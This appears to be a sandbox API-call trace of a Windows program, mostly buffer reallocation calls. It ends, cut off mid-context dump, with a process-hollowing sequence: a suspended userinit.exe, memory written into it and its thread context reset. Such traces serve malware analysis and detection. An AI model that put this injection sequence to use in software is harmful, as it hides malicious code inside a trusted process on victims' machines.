[0177.609] GlobalUnlock (hMem=0x95000c) returned 0
[0177.609] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0177.610] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0177.610] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0177.610] GlobalUnlock (hMem=0x95000c) returned 0
[0177.610] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0177.611] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0177.611] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0177.611] GlobalUnlock (hMem=0x95000c) returned 0
[0177.611] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0177.611] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0177.612] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0177.612] GlobalUnlock (hMem=0x95000c) returned 0
[0177.612] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0177.613] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0177.613] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0177.613] GlobalUnlock (hMem=0x95000c) returned 0
[0177.613] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0177.614] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.615] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.615] GlobalUnlock (hMem=0x95000c) returned 0
[0177.615] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0177.615] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.616] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.616] GlobalUnlock (hMem=0x95000c) returned 0
[0177.616] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0177.616] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.617] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.617] GlobalUnlock (hMem=0x95000c) returned 0
[0177.617] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0177.617] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.617] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.617] GlobalUnlock (hMem=0x95000c) returned 0
[0177.618] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0177.618] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.618] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.618] GlobalUnlock (hMem=0x95000c) returned 0
[0177.618] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0177.618] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.619] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.619] GlobalUnlock (hMem=0x95000c) returned 0
[0177.619] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0177.619] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.620] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.620] GlobalUnlock (hMem=0x95000c) returned 0
[0177.620] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0177.620] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.621] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.621] GlobalUnlock (hMem=0x95000c) returned 0
[0177.621] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0177.621] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.621] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.622] GlobalUnlock (hMem=0x95000c) returned 0
[0177.622] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0177.622] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.622] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.622] GlobalUnlock (hMem=0x95000c) returned 0
[0177.622] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0177.624] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0177.624] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0177.624] GlobalUnlock (hMem=0x95000c) returned 0
[0177.624] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0177.624] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0177.625] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0177.625] GlobalUnlock (hMem=0x95000c) returned 0
[0177.625] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0177.626] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0177.627] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0177.627] GlobalUnlock (hMem=0x95000c) returned 0
[0177.627] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0177.627] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.628] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.628] GlobalUnlock (hMem=0x95000c) returned 0
[0177.628] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0177.628] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.629] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.629] GlobalUnlock (hMem=0x95000c) returned 0
[0177.629] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0177.629] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.629] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.629] GlobalUnlock (hMem=0x95000c) returned 0
[0177.629] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0177.629] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.630] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.630] GlobalUnlock (hMem=0x95000c) returned 0
[0177.630] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0177.630] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.631] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.631] GlobalUnlock (hMem=0x95000c) returned 0
[0177.631] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0177.631] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.632] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.632] GlobalUnlock (hMem=0x95000c) returned 0
[0177.632] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0177.632] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.632] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.633] GlobalUnlock (hMem=0x95000c) returned 0
[0177.633] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0177.633] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.633] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.633] GlobalUnlock (hMem=0x95000c) returned 0
[0177.634] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0177.634] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.634] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.634] GlobalUnlock (hMem=0x95000c) returned 0
[0177.634] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0177.635] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.635] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.635] GlobalUnlock (hMem=0x95000c) returned 0
[0177.635] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0177.635] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.636] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.636] GlobalUnlock (hMem=0x95000c) returned 0
[0177.636] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0177.636] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.637] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.637] GlobalUnlock (hMem=0x95000c) returned 0
[0177.637] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0177.637] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.638] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.638] GlobalUnlock (hMem=0x95000c) returned 0
[0177.638] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0177.638] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.638] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.638] GlobalUnlock (hMem=0x95000c) returned 0
[0177.638] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0177.638] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.639] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.639] GlobalUnlock (hMem=0x95000c) returned 0
[0177.639] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0177.639] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.640] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.640] GlobalUnlock (hMem=0x95000c) returned 0
[0177.640] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0177.640] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.641] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.641] GlobalUnlock (hMem=0x95000c) returned 0
[0177.641] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0177.641] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.641] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.641] GlobalUnlock (hMem=0x95000c) returned 0
[0177.641] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0177.641] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.642] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.642] GlobalUnlock (hMem=0x95000c) returned 0
[0177.642] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0177.642] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.643] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.643] GlobalUnlock (hMem=0x95000c) returned 0
[0177.643] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0177.643] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.644] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.644] GlobalUnlock (hMem=0x95000c) returned 0
[0177.644] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0177.644] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.644] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.644] GlobalUnlock (hMem=0x95000c) returned 0
[0177.644] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0177.644] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.645] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.645] GlobalUnlock (hMem=0x95000c) returned 0
[0177.645] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0177.645] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.646] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.646] GlobalUnlock (hMem=0x95000c) returned 0
[0177.646] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0177.646] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.647] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.647] GlobalUnlock (hMem=0x95000c) returned 0
[0177.647] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0177.647] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.647] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.647] GlobalUnlock (hMem=0x95000c) returned 0
[0177.647] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0177.647] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.648] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.648] GlobalUnlock (hMem=0x95000c) returned 0
[0177.648] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0177.648] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.649] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x12c, hThread=0x130, dwProcessId=0x5cc, dwThreadId=0x3d8)) returned 1
[0177.652] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0177.653] GetThreadContext (in: hThread=0x130, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x6f2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x20fc18, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0177.653] ReadProcessMemory (in: hProcess=0x12c, lpBaseAddress=0x7ffd6008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0177.653] VirtualAllocEx (hProcess=0x12c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0177.653] VirtualAlloc (lpAddress=0x1b0c000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b0c000
[0177.660] WriteProcessMemory (in: hProcess=0x12c, lpBaseAddress=0x400000, lpBuffer=0x1b097a8*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1b097a8*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0177.670] WriteProcessMemory (in: hProcess=0x12c, lpBaseAddress=0x7ffd6008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0177.670] SetThreadContext (hThread=0x130, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x20fc18, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, 